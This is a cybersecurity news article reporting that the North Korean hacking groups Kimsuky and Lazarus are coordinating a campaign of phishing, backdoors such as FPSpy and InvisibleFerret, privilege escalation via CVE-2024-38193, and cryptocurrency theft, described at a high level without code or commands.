Two of North Korea’s most dangerous hacking groups have joined forces to launch a coordinated attack campaign that threatens organizations worldwide.
The Kimsuky and Lazarus groups are working together to steal sensitive intelligence and cryptocurrencies through a systematic approach that combines social engineering with zero-day exploitation.
This partnership represents a major shift in how state-sponsored threat actors operate, moving from isolated attacks to carefully coordinated operations.
The campaign begins with Kimsuky conducting reconnaissance through carefully crafted phishing emails disguised as academic conference invitations or research collaboration requests.
These messages contain malicious attachments in HWP or MSC formats that deploy the FPSpy backdoor when opened. Once installed, the backdoor activates a keylogger called KLogEXE that captures passwords, email content, and system information.
This intelligence gathering phase maps out the target’s network architecture and identifies valuable assets before handing off control to Lazarus.
CN-SEC security researchers noted that Lazarus then exploits zero-day vulnerabilities to gain deeper access to compromised systems.
The group has weaponized CVE-2024-38193, a Windows privilege escalation flaw, to deploy malicious Node.js packages that appear legitimate.
When these packages are executed, attackers gain SYSTEM-level privileges and install the InvisibleFerret backdoor, which bypasses endpoint detection tools through the Fudmodule malware component.
Technical Breakdown of the InvisibleFerret Backdoor
The InvisibleFerret backdoor represents a significant advancement in evasion capabilities. It disguises its network traffic as normal HTTPS web requests, making detection through traffic analysis extremely difficult for security teams.
The malware specifically targets blockchain wallets by scanning system memory for private keys and transaction data stored in browser extensions and desktop applications.
In one documented case, attackers transferred $32 million in cryptocurrency within 48 hours without triggering security alerts.
The backdoor communicates with command and control servers through encrypted channels that rotate daily using a domain polling strategy. Each C2 domain is disguised as a legitimate e-commerce or news website to avoid suspicion.
After completing their objectives, both groups coordinate to remove evidence through shared infrastructure.
They overwrite malicious files with legitimate system processes and delete attack logs. Organizations in defense, finance, energy, and blockchain sectors face the highest risk from this threat.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
